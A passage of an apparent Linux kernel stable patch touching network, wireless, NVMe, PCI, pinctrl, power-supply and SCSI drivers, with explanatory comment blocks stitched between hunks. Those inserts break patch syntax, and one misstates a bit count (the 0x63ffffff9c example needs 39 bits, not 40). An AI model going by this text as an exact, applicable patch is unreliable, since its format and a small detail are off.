+ 		vvfl_v2->num_elements = count;
+ 		list_for_each_entry_safe(f, ftmp, &adapter->vlan_filter_list, list) {
+-			if (f->remove) {
++			if (f->state == IAVF_VLAN_DISABLE ||
++			    f->state == IAVF_VLAN_REMOVE) {
+ 				struct virtchnl_vlan_supported_caps *filtering_support =
+ 					&adapter->vlan_v2_caps.filtering.filtering_support;
+ 				struct virtchnl_vlan *vlan;
+@@ -915,8 +921,13 @@ void iavf_del_vlans(struct iavf_adapter *adapter)
+ 				vlan->tci = f->vlan.vid;
+ 				vlan->tpid = f->vlan.tpid;
+ 
+-				list_del(&f->list);
+-				kfree(f);
++				if (f->state == IAVF_VLAN_DISABLE) {
++					f->state = IAVF_VLAN_INACTIVE;
++				} else {
++					list_del(&f->list);
++					kfree(f);
++					adapter->num_vlan_filters--;
++				}
+ 				i++;
+ 				if (i == count)
+ 					break;
+@@ -2192,7 +2203,7 @@ void iavf_virtchnl_completion(struct iavf_adapter *adapter,
+ 				list_for_each_entry(vlf,
+ 						    &adapter->vlan_filter_list,
+ 						    list)
+-					vlf->add = true;
++					vlf->state = IAVF_VLAN_ADD;
+ 
+ 				adapter->aq_required |=
+ 					IAVF_FLAG_AQ_ADD_VLAN_FILTER;
+@@ -2260,7 +2271,7 @@ void iavf_virtchnl_completion(struct iavf_adapter *adapter,
+ 				list_for_each_entry(vlf,
+ 						    &adapter->vlan_filter_list,
+ 						    list)
+-					vlf->add = true;
++					vlf->state = IAVF_VLAN_ADD;
+ 
+ 				aq_required |= IAVF_FLAG_AQ_ADD_VLAN_FILTER;
+ 			}
+@@ -2444,15 +2455,8 @@ void iavf_virtchnl_completion(struct iavf_adapter *adapter,
+ 
+ 		spin_lock_bh(&adapter->mac_vlan_list_lock);
+ 		list_for_each_entry(f, &adapter->vlan_filter_list, list) {
+-			if (f->is_new_vlan) {
+-				f->is_new_vlan = false;
+-				if (f->vlan.tpid == ETH_P_8021Q)
+-					set_bit(f->vlan.vid,
+-						adapter->vsi.active_cvlans);
+-				else
+-					set_bit(f->vlan.vid,
+-						adapter->vsi.active_svlans);
+-			}
++			if (f->state == IAVF_VLAN_IS_NEW)
++				f->state = IAVF_VLAN_ACTIVE;
+ 		}
+ 		spin_unlock_bh(&adapter->mac_vlan_list_lock);
+ 		}
+diff --git a/drivers/net/ethernet/qlogic/qlcnic/qlcnic_ctx.c b/drivers/net/ethernet/qlogic/qlcnic/qlcnic_ctx.c
+index 87f76bac2e463..eb827b86ecae8 100644
+--- a/drivers/net/ethernet/qlogic/qlcnic/qlcnic_ctx.c
++++ b/drivers/net/ethernet/qlogic/qlcnic/qlcnic_ctx.c
+@@ -628,7 +628,13 @@ int qlcnic_fw_create_ctx(struct qlcnic_adapter *dev)
+ 	int i, err, ring;
+ 
+ 	if (dev->flags & QLCNIC_NEED_FLR) {
+-		pci_reset_function(dev->pdev);
++		err = pci_reset_function(dev->pdev);
++		if (err) {
++			dev_err(&dev->pdev->dev,
++				"Adapter reset failed (%d). Please reboot\n",
++				err);
++			return err;
++		}
+ 		dev->flags &= ~QLCNIC_NEED_FLR;
+ 	}
+ 
+diff --git a/drivers/net/ethernet/sun/niu.c b/drivers/net/ethernet/sun/niu.c
+index e6144d963eaaa..4bbf011d53e69 100644
+--- a/drivers/net/ethernet/sun/niu.c
++++ b/drivers/net/ethernet/sun/niu.c
+@@ -4522,7 +4522,7 @@ static int niu_alloc_channels(struct niu *np)
+ 
+ 		err = niu_rbr_fill(np, rp, GFP_KERNEL);
+ 		if (err)
+-			return err;
++			goto out_err;
+ 	}
+ 
+ 	tx_rings = kcalloc(num_tx_rings, sizeof(struct tx_ring_info),
+diff --git a/drivers/net/phy/nxp-c45-tja11xx.c b/drivers/net/phy/nxp-c45-tja11xx.c
+index 5813b07242ce1..029875a59ff89 100644
+--- a/drivers/net/phy/nxp-c45-tja11xx.c
++++ b/drivers/net/phy/nxp-c45-tja11xx.c
+@@ -191,7 +191,7 @@
+ #define MAX_ID_PS			2260U
+ #define DEFAULT_ID_PS			2000U
+ 
+-#define PPM_TO_SUBNS_INC(ppb)	div_u64(GENMASK(31, 0) * (ppb) * \
++#define PPM_TO_SUBNS_INC(ppb)	div_u64(GENMASK_ULL(31, 0) * (ppb) * \
+ 					PTP_CLK_PERIOD_100BT1, NSEC_PER_SEC)
+ 
+ #define NXP_C45_SKB_CB(skb)	((struct nxp_c45_skb_cb *)(skb)->cb)
+@@ -1337,6 +1337,17 @@ no_ptp_support:
+ 	return ret;
+ }
+ 
++static void nxp_c45_remove(struct phy_device *phydev)
++{
++	struct nxp_c45_phy *priv = phydev->priv;
++
++	if (priv->ptp_clock)
++		ptp_clock_unregister(priv->ptp_clock);
++
++	skb_queue_purge(&priv->tx_queue);
++	skb_queue_purge(&priv->rx_queue);
++}
++
+ static struct phy_driver nxp_c45_driver[] = {
+ 	{
+ 		PHY_ID_MATCH_MODEL(PHY_ID_TJA_1103),
+@@ -1359,6 +1370,7 @@ static struct phy_driver nxp_c45_driver[] = {
+ 		.set_loopback		= genphy_c45_loopback,
+ 		.get_sqi		= nxp_c45_get_sqi,
+ 		.get_sqi_max		= nxp_c45_get_sqi_max,
++		.remove			= nxp_c45_remove,
+ 	},
+ };
+ 
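+/*
+ * The PPM_TO_SUBNS_INC() fix above is a 32-bit overflow repair:
+ * GENMASK(31, 0) has type unsigned long, which is only 32 bits on
+ * 32-bit builds, so the GENMASK(31, 0) * ppb product wrapped before
+ * div_u64() ever saw it. GENMASK_ULL(31, 0) promotes the whole
+ * expression to u64. Worked example with ppb = 100:
+ *
+ *	0xffffffffULL * 100 = 0x63ffffff9c  (40 bits, needs u64)
+ */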
+diff --git a/drivers/net/phy/sfp.c b/drivers/net/phy/sfp.c
+index 83b99d95b2787..b224800d7db0b 100644
+--- a/drivers/net/phy/sfp.c
++++ b/drivers/net/phy/sfp.c
+@@ -212,6 +212,12 @@ static const enum gpiod_flags gpio_flags[] = {
+ #define SFP_PHY_ADDR		22
+ #define SFP_PHY_ADDR_ROLLBALL	17
+ 
++/* SFP_EEPROM_BLOCK_SIZE is the size of the data chunk to read from the
++ * EEPROM at a time. Some SFP modules and some Linux I2C drivers do not like
++ * reads longer than 16 bytes.
++ */
++#define SFP_EEPROM_BLOCK_SIZE	16
++
+ struct sff_data {
+ 	unsigned int gpios;
+ 	bool (*module_supported)(const struct sfp_eeprom_id *id);
+@@ -1927,11 +1933,7 @@ static int sfp_sm_mod_probe(struct sfp *sfp, bool report)
+ 	u8 check;
+ 	int ret;
+ 
+-	/* Some SFP modules and also some Linux I2C drivers do not like reads
+-	 * longer than 16 bytes, so read the EEPROM in chunks of 16 bytes at
+-	 * a time.
+-	 */
+-	sfp->i2c_block_size = 16;
++	sfp->i2c_block_size = SFP_EEPROM_BLOCK_SIZE;
+ 
+ 	ret = sfp_read(sfp, false, 0, &id.base, sizeof(id.base));
+ 	if (ret < 0) {
+@@ -2614,6 +2616,7 @@ static struct sfp *sfp_alloc(struct device *dev)
+ 		return ERR_PTR(-ENOMEM);
+ 
+ 	sfp->dev = dev;
++	sfp->i2c_block_size = SFP_EEPROM_BLOCK_SIZE;
+ 
+ 	mutex_init(&sfp->sm_mutex);
+ 	mutex_init(&sfp->st_mutex);
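+/*
+ * Besides naming the constant, the sfp.c change seeds i2c_block_size in
+ * sfp_alloc(): any EEPROM access that happens before the state machine
+ * reaches sfp_sm_mod_probe() (where it used to be set) now also uses
+ * the conservative 16-byte chunking instead of a zero-initialised size.
+ */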
+diff --git a/drivers/net/wireless/intel/iwlwifi/mvm/mac80211.c b/drivers/net/wireless/intel/iwlwifi/mvm/mac80211.c
+index 5273ade711176..1d46a2b345eb3 100644
+--- a/drivers/net/wireless/intel/iwlwifi/mvm/mac80211.c
++++ b/drivers/net/wireless/intel/iwlwifi/mvm/mac80211.c
+@@ -732,7 +732,10 @@ void iwl_mvm_mac_itxq_xmit(struct ieee80211_hw *hw, struct ieee80211_txq *txq)
+ 
+ 	rcu_read_lock();
+ 	do {
+-		while (likely(!mvmtxq->stopped &&
++		while (likely(!test_bit(IWL_MVM_TXQ_STATE_STOP_FULL,
++					&mvmtxq->state) &&
++			      !test_bit(IWL_MVM_TXQ_STATE_STOP_REDIRECT,
++					&mvmtxq->state) &&
+ 			      !test_bit(IWL_MVM_STATUS_IN_D3, &mvm->status))) {
+ 			skb = ieee80211_tx_dequeue(hw, txq);
+ 
+@@ -757,42 +760,25 @@ static void iwl_mvm_mac_wake_tx_queue(struct ieee80211_hw *hw,
+ 	struct iwl_mvm *mvm = IWL_MAC80211_GET_MVM(hw);
+ 	struct iwl_mvm_txq *mvmtxq = iwl_mvm_txq_from_mac80211(txq);
+ 
+-	/*
+-	 * Please note that racing is handled very carefully here:
+-	 * mvmtxq->txq_id is updated during allocation, and mvmtxq->list is
+-	 * deleted afterwards.
+-	 * This means that if:
+-	 * mvmtxq->txq_id != INVALID_QUEUE && list_empty(&mvmtxq->list):
+-	 *	queue is allocated and we can TX.
+-	 * mvmtxq->txq_id != INVALID_QUEUE && !list_empty(&mvmtxq->list):
+-	 *	a race, should defer the frame.
+-	 * mvmtxq->txq_id == INVALID_QUEUE && list_empty(&mvmtxq->list):
+-	 *	need to allocate the queue and defer the frame.
+-	 * mvmtxq->txq_id == INVALID_QUEUE && !list_empty(&mvmtxq->list):
+-	 *	queue is already scheduled for allocation, no need to allocate,
+-	 *	should defer the frame.
+-	 */
+-
+-	/* If the queue is allocated TX and return. */
+-	if (!txq->sta || mvmtxq->txq_id != IWL_MVM_INVALID_QUEUE) {
+-		/*
+-		 * Check that list is empty to avoid a race where txq_id is
+-		 * already updated, but the queue allocation work wasn't
+-		 * finished
+-		 */
+-		if (unlikely(txq->sta && !list_empty(&mvmtxq->list)))
+-			return;
+-
++	if (likely(test_bit(IWL_MVM_TXQ_STATE_READY, &mvmtxq->state)) ||
++	    !txq->sta) {
+ 		iwl_mvm_mac_itxq_xmit(hw, txq);
+ 		return;
+ 	}
+ 
+-	/* The list is being deleted only after the queue is fully allocated. */
+-	if (!list_empty(&mvmtxq->list))
+-		return;
++	/* iwl_mvm_mac_itxq_xmit() will later be called by the worker
++	 * to handle any packets we leave on the txq now
++	 */
+ 
+-	list_add_tail(&mvmtxq->list, &mvm->add_stream_txqs);
+-	schedule_work(&mvm->add_stream_wk);
++	spin_lock_bh(&mvm->add_stream_lock);
++	/* The list is being deleted only after the queue is fully allocated. */
++	if (list_empty(&mvmtxq->list) &&
++	    /* recheck under lock */
++	    !test_bit(IWL_MVM_TXQ_STATE_READY, &mvmtxq->state)) {
++		list_add_tail(&mvmtxq->list, &mvm->add_stream_txqs);
++		schedule_work(&mvm->add_stream_wk);
++	}
++	spin_unlock_bh(&mvm->add_stream_lock);
+ }
+ 
+ #define CHECK_BA_TRIGGER(_mvm, _trig, _tid_bm, _tid, _fmt...)		\
+diff --git a/drivers/net/wireless/intel/iwlwifi/mvm/mvm.h b/drivers/net/wireless/intel/iwlwifi/mvm/mvm.h
+index ce6b701f3f4cd..157de77e129e4 100644
+--- a/drivers/net/wireless/intel/iwlwifi/mvm/mvm.h
++++ b/drivers/net/wireless/intel/iwlwifi/mvm/mvm.h
+@@ -729,7 +729,10 @@ struct iwl_mvm_txq {
+ 	struct list_head list;
+ 	u16 txq_id;
+ 	atomic_t tx_request;
+-	bool stopped;
++#define IWL_MVM_TXQ_STATE_STOP_FULL	0
++#define IWL_MVM_TXQ_STATE_STOP_REDIRECT	1
++#define IWL_MVM_TXQ_STATE_READY		2
++	unsigned long state;
+ };
+ 
+ static inline struct iwl_mvm_txq *
+@@ -827,6 +830,7 @@ struct iwl_mvm {
+ 		struct iwl_mvm_tvqm_txq_info tvqm_info[IWL_MAX_TVQM_QUEUES];
+ 	};
+ 	struct work_struct add_stream_wk; /* To add streams to queues */
++	spinlock_t add_stream_lock;
+ 
+ 	const char *nvm_file_name;
+ 	struct iwl_nvm_data *nvm_data;
+diff --git a/drivers/net/wireless/intel/iwlwifi/mvm/ops.c b/drivers/net/wireless/intel/iwlwifi/mvm/ops.c
+index ebe6d9c4ccafb..c49a2a1ee4867 100644
+--- a/drivers/net/wireless/intel/iwlwifi/mvm/ops.c
++++ b/drivers/net/wireless/intel/iwlwifi/mvm/ops.c
+@@ -1194,6 +1194,7 @@ iwl_op_mode_mvm_start(struct iwl_trans *trans, const struct iwl_cfg *cfg,
+ 	INIT_DELAYED_WORK(&mvm->scan_timeout_dwork, iwl_mvm_scan_timeout_wk);
+ 	INIT_WORK(&mvm->add_stream_wk, iwl_mvm_add_new_dqa_stream_wk);
+ 	INIT_LIST_HEAD(&mvm->add_stream_txqs);
++	spin_lock_init(&mvm->add_stream_lock);
+ 
+ 	init_waitqueue_head(&mvm->rx_sync_waitq);
+ 
+@@ -1690,7 +1691,10 @@ static void iwl_mvm_queue_state_change(struct iwl_op_mode *op_mode,
+ 
+ 		txq = sta->txq[tid];
+ 		mvmtxq = iwl_mvm_txq_from_mac80211(txq);
+-		mvmtxq->stopped = !start;
++		if (start)
++			clear_bit(IWL_MVM_TXQ_STATE_STOP_FULL, &mvmtxq->state);
++		else
++			set_bit(IWL_MVM_TXQ_STATE_STOP_FULL, &mvmtxq->state);
+ 
+ 		if (start && mvmsta->sta_state != IEEE80211_STA_NOTEXIST)
+ 			iwl_mvm_mac_itxq_xmit(mvm->hw, txq);
+diff --git a/drivers/net/wireless/intel/iwlwifi/mvm/sta.c b/drivers/net/wireless/intel/iwlwifi/mvm/sta.c
+index 69634fb82a9bf..9caae77995ca9 100644
+--- a/drivers/net/wireless/intel/iwlwifi/mvm/sta.c
++++ b/drivers/net/wireless/intel/iwlwifi/mvm/sta.c
+@@ -384,8 +384,11 @@ static int iwl_mvm_disable_txq(struct iwl_mvm *mvm, struct ieee80211_sta *sta,
+ 		struct iwl_mvm_txq *mvmtxq =
+ 			iwl_mvm_txq_from_tid(sta, tid);
+ 
+-		mvmtxq->txq_id = IWL_MVM_INVALID_QUEUE;
++		spin_lock_bh(&mvm->add_stream_lock);
+ 		list_del_init(&mvmtxq->list);
++		clear_bit(IWL_MVM_TXQ_STATE_READY, &mvmtxq->state);
++		mvmtxq->txq_id = IWL_MVM_INVALID_QUEUE;
++		spin_unlock_bh(&mvm->add_stream_lock);
+ 	}
+ 
+ 	/* Regardless if this is a reserved TXQ for a STA - mark it as false */
+@@ -479,8 +482,11 @@ static int iwl_mvm_remove_sta_queue_marking(struct iwl_mvm *mvm, int queue)
+ 			disable_agg_tids |= BIT(tid);
+ 		mvmsta->tid_data[tid].txq_id = IWL_MVM_INVALID_QUEUE;
+ 
+-		mvmtxq->txq_id = IWL_MVM_INVALID_QUEUE;
++		spin_lock_bh(&mvm->add_stream_lock);
+ 		list_del_init(&mvmtxq->list);
++		clear_bit(IWL_MVM_TXQ_STATE_READY, &mvmtxq->state);
++		mvmtxq->txq_id = IWL_MVM_INVALID_QUEUE;
++		spin_unlock_bh(&mvm->add_stream_lock);
+ 	}
+ 
+ 	mvmsta->tfd_queue_msk &= ~BIT(queue); /* Don't use this queue anymore */
+@@ -693,7 +699,7 @@ static int iwl_mvm_redirect_queue(struct iwl_mvm *mvm, int queue, int tid,
+ 			    queue, iwl_mvm_ac_to_tx_fifo[ac]);
+ 
+ 	/* Stop the queue and wait for it to empty */
+-	txq->stopped = true;
++	set_bit(IWL_MVM_TXQ_STATE_STOP_REDIRECT, &txq->state);
+ 
+ 	ret = iwl_trans_wait_tx_queues_empty(mvm->trans, BIT(queue));
+ 	if (ret) {
+@@ -736,7 +742,7 @@ static int iwl_mvm_redirect_queue(struct iwl_mvm *mvm, int queue, int tid,
+ 
+ out:
+ 	/* Continue using the queue */
+-	txq->stopped = false;
++	clear_bit(IWL_MVM_TXQ_STATE_STOP_REDIRECT, &txq->state);
+ 
+ 	return ret;
+ }
+@@ -1444,12 +1450,22 @@ void iwl_mvm_add_new_dqa_stream_wk(struct work_struct *wk)
+ 		 * a queue in the function itself.
+ 		 */
+ 		if (iwl_mvm_sta_alloc_queue(mvm, txq->sta, txq->ac, tid)) {
++			spin_lock_bh(&mvm->add_stream_lock);
+ 			list_del_init(&mvmtxq->list);
++			spin_unlock_bh(&mvm->add_stream_lock);
+ 			continue;
+ 		}
+ 
+-		list_del_init(&mvmtxq->list);
++		/* now we're ready, any remaining races/concurrency will be
++		 * handled in iwl_mvm_mac_itxq_xmit()
++		 */
++		set_bit(IWL_MVM_TXQ_STATE_READY, &mvmtxq->state);
++
+ 		local_bh_disable();
++		spin_lock(&mvm->add_stream_lock);
++		list_del_init(&mvmtxq->list);
++		spin_unlock(&mvm->add_stream_lock);
++
+ 		iwl_mvm_mac_itxq_xmit(mvm->hw, txq);
+ 		local_bh_enable();
+ 	}
+@@ -1864,8 +1880,11 @@ static void iwl_mvm_disable_sta_queues(struct iwl_mvm *mvm,
+ 		struct iwl_mvm_txq *mvmtxq =
+ 			iwl_mvm_txq_from_mac80211(sta->txq[i]);
+ 
++		spin_lock_bh(&mvm->add_stream_lock);
+ 		mvmtxq->txq_id = IWL_MVM_INVALID_QUEUE;
+ 		list_del_init(&mvmtxq->list);
++		clear_bit(IWL_MVM_TXQ_STATE_READY, &mvmtxq->state);
++		spin_unlock_bh(&mvm->add_stream_lock);
+ 	}
+ }
+ 
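+/*
+ * The iwlwifi rework replaces the single `stopped` bool with atomic
+ * state bits, so "stopped because full" and "stopped for redirect" can
+ * be set and cleared independently from different contexts without one
+ * writer clobbering the other, while a READY bit (rechecked under
+ * add_stream_lock) closes the allocation race the deleted comment used
+ * to describe. Generic sketch of the bitops idiom, outside any iwlwifi
+ * structure:
+ */
+#define TXQ_STATE_STOP_FULL	0
+#define TXQ_STATE_STOP_REDIRECT	1
+
+static bool txq_may_xmit(const unsigned long *state)
+{
+	/* set_bit()/clear_bit() are atomic RMW; test_bit() is a plain read */
+	return !test_bit(TXQ_STATE_STOP_FULL, state) &&
+	       !test_bit(TXQ_STATE_STOP_REDIRECT, state);
+}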
+diff --git a/drivers/net/wireless/marvell/mwifiex/pcie.c b/drivers/net/wireless/marvell/mwifiex/pcie.c
+index 5dcf61761a165..9a698a16a8f38 100644
+--- a/drivers/net/wireless/marvell/mwifiex/pcie.c
++++ b/drivers/net/wireless/marvell/mwifiex/pcie.c
+@@ -172,7 +172,7 @@ static const struct mwifiex_pcie_device mwifiex_pcie8997 = {
+ 	.can_ext_scan = true,
+ };
+ 
+-static const struct of_device_id mwifiex_pcie_of_match_table[] = {
++static const struct of_device_id mwifiex_pcie_of_match_table[] __maybe_unused = {
+ 	{ .compatible = "pci11ab,2b42" },
+ 	{ .compatible = "pci1b4b,2b42" },
+ 	{ }
+diff --git a/drivers/net/wireless/marvell/mwifiex/sdio.c b/drivers/net/wireless/marvell/mwifiex/sdio.c
+index 9f506efa53705..ea1c1c2412e72 100644
+--- a/drivers/net/wireless/marvell/mwifiex/sdio.c
++++ b/drivers/net/wireless/marvell/mwifiex/sdio.c
+@@ -479,7 +479,7 @@ static struct memory_type_mapping mem_type_mapping_tbl[] = {
+ 	{"EXTLAST", NULL, 0, 0xFE},
+ };
+ 
+-static const struct of_device_id mwifiex_sdio_of_match_table[] = {
++static const struct of_device_id mwifiex_sdio_of_match_table[] __maybe_unused = {
+ 	{ .compatible = "marvell,sd8787" },
+ 	{ .compatible = "marvell,sd8897" },
+ 	{ .compatible = "marvell,sd8997" },
+diff --git a/drivers/net/wwan/iosm/iosm_ipc_pcie.c b/drivers/net/wwan/iosm/iosm_ipc_pcie.c
+index 5bf5a93937c9c..04517bd3325a2 100644
+--- a/drivers/net/wwan/iosm/iosm_ipc_pcie.c
++++ b/drivers/net/wwan/iosm/iosm_ipc_pcie.c
+@@ -295,7 +295,7 @@ static int ipc_pcie_probe(struct pci_dev *pci,
+ 	ret = dma_set_mask(ipc_pcie->dev, DMA_BIT_MASK(64));
+ 	if (ret) {
+ 		dev_err(ipc_pcie->dev, "Could not set PCI DMA mask: %d", ret);
+-		return ret;
++		goto set_mask_fail;
+ 	}
+ 
+ 	ipc_pcie_config_aspm(ipc_pcie);
+@@ -323,6 +323,7 @@ static int ipc_pcie_probe(struct pci_dev *pci,
+ imem_init_fail:
+ 	ipc_pcie_resources_release(ipc_pcie);
+ resources_req_fail:
++set_mask_fail:
+ 	pci_disable_device(pci);
+ pci_enable_fail:
+ 	kfree(ipc_pcie);
+diff --git a/drivers/nvme/host/core.c b/drivers/nvme/host/core.c
+index ee1b075d12cfc..c0429f9f50920 100644
+--- a/drivers/nvme/host/core.c
++++ b/drivers/nvme/host/core.c
+@@ -3106,7 +3106,8 @@ static int nvme_init_non_mdts_limits(struct nvme_ctrl *ctrl)
+ 	else
+ 		ctrl->max_zeroes_sectors = 0;
+ 
+-	if (nvme_ctrl_limited_cns(ctrl))
++	if (ctrl->subsys->subtype != NVME_NQN_NVME ||
++	    nvme_ctrl_limited_cns(ctrl))
+ 		return 0;
+ 
+ 	id = kzalloc(sizeof(*id), GFP_KERNEL);
+diff --git a/drivers/nvme/host/pci.c b/drivers/nvme/host/pci.c
+index ea3f0806783a3..989f31471da69 100644
+--- a/drivers/nvme/host/pci.c
++++ b/drivers/nvme/host/pci.c
+@@ -3494,6 +3494,9 @@ static const struct pci_device_id nvme_id_table[] = {
+ 	{ PCI_DEVICE(0x1d97, 0x1d97), /* Lexar NM620 */
+ 		.driver_data = NVME_QUIRK_BOGUS_NID, },
+ 	{ PCI_DEVICE(0x1d97, 0x2269), /* Lexar NM760 */
++		.driver_data = NVME_QUIRK_BOGUS_NID |
++				NVME_QUIRK_IGNORE_DEV_SUBNQN, },
++	{ PCI_DEVICE(0x10ec, 0x5763), /* TEAMGROUP T-FORCE CARDEA ZERO Z330 SSD */
+ 		.driver_data = NVME_QUIRK_BOGUS_NID, },
+ 	{ PCI_DEVICE(PCI_VENDOR_ID_AMAZON, 0x0061),
+ 		.driver_data = NVME_QUIRK_DMA_ADDRESS_BITS_48, },
+diff --git a/drivers/pci/remove.c b/drivers/pci/remove.c
+index 0145aef1b9301..22d39e12b236a 100644
+--- a/drivers/pci/remove.c
++++ b/drivers/pci/remove.c
+@@ -157,8 +157,6 @@ void pci_remove_root_bus(struct pci_bus *bus)
+ 	list_for_each_entry_safe(child, tmp,
+ 				 &bus->devices, bus_list)
+ 		pci_remove_bus_device(child);
+-	pci_remove_bus(bus);
+-	host_bridge->bus = NULL;
+ 
+ #ifdef CONFIG_PCI_DOMAINS_GENERIC
+ 	/* Release domain_nr if it was dynamically allocated */
+@@ -166,6 +164,9 @@ void pci_remove_root_bus(struct pci_bus *bus)
+ 		pci_bus_release_domain_nr(bus, host_bridge->dev.parent);
+ #endif
+ 
++	pci_remove_bus(bus);
++	host_bridge->bus = NULL;
++
+ 	/* remove the host bridge */
+ 	device_del(&host_bridge->dev);
+ }
+diff --git a/drivers/pinctrl/pinctrl-amd.c b/drivers/pinctrl/pinctrl-amd.c
+index 5e7b82a2b13d0..32c3edaf90385 100644
+--- a/drivers/pinctrl/pinctrl-amd.c
++++ b/drivers/pinctrl/pinctrl-amd.c
+@@ -865,34 +865,32 @@ static const struct pinconf_ops amd_pinconf_ops = {
+ 	.pin_config_group_set = amd_pinconf_group_set,
+ };
+ 
+-static void amd_gpio_irq_init_pin(struct amd_gpio *gpio_dev, int pin)
++static void amd_gpio_irq_init(struct amd_gpio *gpio_dev)
+ {
+-	const struct pin_desc *pd;
++	struct pinctrl_desc *desc = gpio_dev->pctrl->desc;
+ 	unsigned long flags;
+ 	u32 pin_reg, mask;
++	int i;
+ 
+ 	mask = BIT(WAKE_CNTRL_OFF_S0I3) | BIT(WAKE_CNTRL_OFF_S3) |
+ 		BIT(INTERRUPT_MASK_OFF) | BIT(INTERRUPT_ENABLE_OFF) |
+ 		BIT(WAKE_CNTRL_OFF_S4);
+ 
+-	pd = pin_desc_get(gpio_dev->pctrl, pin);
+-	if (!pd)
+-		return;
++	for (i = 0; i < desc->npins; i++) {
++		int pin = desc->pins[i].number;
++		const struct pin_desc *pd = pin_desc_get(gpio_dev->pctrl, pin);
+ 
+-	raw_spin_lock_irqsave(&gpio_dev->lock, flags);
+-	pin_reg = readl(gpio_dev->base + pin * 4);
+-	pin_reg &= ~mask;
+-	writel(pin_reg, gpio_dev->base + pin * 4);
+-	raw_spin_unlock_irqrestore(&gpio_dev->lock, flags);
+-}
++		if (!pd)
++			continue;
+ 
+-static void amd_gpio_irq_init(struct amd_gpio *gpio_dev)
+-{
+-	struct pinctrl_desc *desc = gpio_dev->pctrl->desc;
+-	int i;
++		raw_spin_lock_irqsave(&gpio_dev->lock, flags);
+ 
+-	for (i = 0; i < desc->npins; i++)
+-		amd_gpio_irq_init_pin(gpio_dev, i);
++		pin_reg = readl(gpio_dev->base + i * 4);
++		pin_reg &= ~mask;
++		writel(pin_reg, gpio_dev->base + i * 4);
++
++		raw_spin_unlock_irqrestore(&gpio_dev->lock, flags);
++	}
+ }
+ 
+ #ifdef CONFIG_PM_SLEEP
+@@ -945,10 +943,8 @@ static int amd_gpio_resume(struct device *dev)
+ 	for (i = 0; i < desc->npins; i++) {
+ 		int pin = desc->pins[i].number;
+ 
+-		if (!amd_gpio_should_save(gpio_dev, pin)) {
+-			amd_gpio_irq_init_pin(gpio_dev, pin);
++		if (!amd_gpio_should_save(gpio_dev, pin))
+ 			continue;
+-		}
+ 
+ 		raw_spin_lock_irqsave(&gpio_dev->lock, flags);
+ 		gpio_dev->saved_regs[i] |= readl(gpio_dev->base + pin * 4) & PIN_IRQ_PENDING;
+diff --git a/drivers/power/supply/axp288_fuel_gauge.c b/drivers/power/supply/axp288_fuel_gauge.c
+index 8e6f8a6550790..05f4131784629 100644
+--- a/drivers/power/supply/axp288_fuel_gauge.c
++++ b/drivers/power/supply/axp288_fuel_gauge.c
+@@ -724,6 +724,8 @@ static int axp288_fuel_gauge_probe(struct platform_device *pdev)
+ 
+ 	for (i = 0; i < AXP288_FG_INTR_NUM; i++) {
+ 		pirq = platform_get_irq(pdev, i);
++		if (pirq < 0)
++			continue;
+ 		ret = regmap_irq_get_virq(axp20x->regmap_irqc, pirq);
+ 		if (ret < 0)
+ 			return dev_err_probe(dev, ret, "getting vIRQ %d\n", pirq);
+diff --git a/drivers/power/supply/cros_usbpd-charger.c b/drivers/power/supply/cros_usbpd-charger.c
+index cadb6a0c2cc7e..b6c96376776a9 100644
+--- a/drivers/power/supply/cros_usbpd-charger.c
++++ b/drivers/power/supply/cros_usbpd-charger.c
+@@ -276,7 +276,7 @@ static int cros_usbpd_charger_get_power_info(struct port_data *port)
+ 		port->psy_current_max = 0;
+ 		break;
+ 	default:
+-		dev_err(dev, "Port %d: default case!\n", port->port_number);
++		dev_dbg(dev, "Port %d: default case!\n", port->port_number);
+ 		port->psy_usb_type = POWER_SUPPLY_USB_TYPE_SDP;
+ 	}
+ 
+diff --git a/drivers/power/supply/rk817_charger.c b/drivers/power/supply/rk817_charger.c
+index 4f9c1c4179165..36f807b5ec442 100644
+--- a/drivers/power/supply/rk817_charger.c
++++ b/drivers/power/supply/rk817_charger.c
+@@ -785,8 +785,6 @@ rk817_read_or_set_full_charge_on_boot(struct rk817_charger *charger,
+ 		regmap_bulk_read(rk808->regmap, RK817_GAS_GAUGE_Q_PRES_H3,
+ 				 bulk_reg, 4);
+ 		tmp = get_unaligned_be32(bulk_reg);
+-		if (tmp < 0)
+-			tmp = 0;
+ 		boot_charge_mah = ADC_TO_CHARGE_UAH(tmp,
+ 						    charger->res_div) / 1000;
+ 		/*
+@@ -825,8 +823,6 @@ rk817_read_or_set_full_charge_on_boot(struct rk817_charger *charger,
+ 	regmap_bulk_read(rk808->regmap, RK817_GAS_GAUGE_Q_PRES_H3,
+ 			 bulk_reg, 4);
+ 	tmp = get_unaligned_be32(bulk_reg);
+-	if (tmp < 0)
+-		tmp = 0;
+ 	boot_charge_mah = ADC_TO_CHARGE_UAH(tmp, charger->res_div) / 1000;
+ 	regmap_bulk_read(rk808->regmap, RK817_GAS_GAUGE_OCV_VOL_H,
+ 			 bulk_reg, 2);
+diff --git a/drivers/scsi/ses.c b/drivers/scsi/ses.c
+index 1707d6d144d21..6a1428d453f3e 100644
+--- a/drivers/scsi/ses.c
++++ b/drivers/scsi/ses.c
+@@ -503,9 +503,6 @@ static int ses_enclosure_find_by_addr(struct enclosure_device *edev,
+ 	int i;
+ 	struct ses_component *scomp;
+ 
+-	if (!edev->component[0].scratch)
+-		return 0;
+-
+ 	for (i = 0; i < edev->components; i++) {
+ 		scomp = edev->component[i].scratch;
+ 		if (scomp->addr != efd->addr)
+@@ -596,8 +593,10 @@ static void ses_enclosure_data_process(struct enclosure_device *edev,
+ 						components++,
+ 						type_ptr[0],
+ 						name);
+-				else
++				else if (components < edev->components)
+ 					ecomp = &edev->component[components++];
++				else
++					ecomp = ERR_PTR(-EINVAL);
+ 
+ 				if (!IS_ERR(ecomp)) {
+ 					if (addl_desc_ptr) {
+@@ -728,11 +727,6 @@ static int ses_intf_add(struct device *cdev,
+ 			components += type_ptr[1];
+ 	}
+ 
+-	if (components == 0) {
+-		sdev_printk(KERN_WARNING, sdev, "enclosure has no enumerated components\n");
+-		goto err_free;
+-	}
+-
+ 	ses_dev->page1 = buf;
+ 	ses_dev->page1_len = len;
+ 	buf = NULL;
+@@ -774,9 +768,11 @@ static int ses_intf_add(struct device *cdev,
+ 		buf = NULL;
+ 	}
+ page2_not_supported:
+-	scomp = kcalloc(components, sizeof(struct ses_component), GFP_KERNEL);
+-	if (!scomp)
+-		goto err_free;
++	if (components > 0) {
++		scomp = kcalloc(components, sizeof(struct ses_component), GFP_KERNEL);
++		if (!scomp)
++			goto err_free;
++	}
+ 
+ 	edev = enclosure_register(cdev->parent, dev_name(&sdev->sdev_gendev),
